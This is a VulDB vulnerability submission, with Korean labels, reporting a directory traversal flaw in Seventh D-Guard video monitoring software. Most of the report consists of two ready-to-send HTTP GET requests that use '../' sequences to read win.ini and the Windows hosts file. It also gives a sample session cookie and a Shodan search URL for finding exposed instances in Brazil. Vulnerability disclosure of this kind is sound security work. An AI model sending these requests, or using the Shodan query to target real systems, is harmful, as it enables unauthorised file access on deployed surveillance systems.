| 제목 | Seventh D-Guard NA Path Traversal |
|---|
| 설명 | URL Vendor: https://www.seventh.com.br/
Product:
https://www.seventh.com.br/solucoes/projetos-de-monitoramento/videomonitoramento
https://www.seventh.com.br/suporte/dispositivos-integrados/dguard
Directory Traversal is a vulnerability which allows attackers to access restricted directories and read files outside of the web server's root directory.
GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Readind /etc/hosts
GET /../../../../../../../../Windows/System32/Drivers/Etc/hosts HTTP/1.1
Host: x.x.x.x:8081
Cookie: SessaoId=ZZIOVeZ5wHOgBm17gGXe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Connection: Keep-alive
Shodan Query:
https://www.shodan.io/search?query=Title%3A%22Web%22+Content-Length%3A+21928+country%3A%22BR%22+Content-Type%3A+text%2Fhtml%3B+charset%3DISO-8859-1&page=3
|
|---|
| 사용자 | c4ng4c3ir0 (UID 38456) |
|---|
| 제출 | 2025. 02. 06. PM 06:29 (1 년도 ago) |
|---|
| 모더레이션 | 2025. 02. 15. PM 04:31 (9 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 295965 [Seventh D-Guard 까지 20250206 HTTP GET Request 디렉토리 순회] |
|---|
| 포인트들 | 17 |
|---|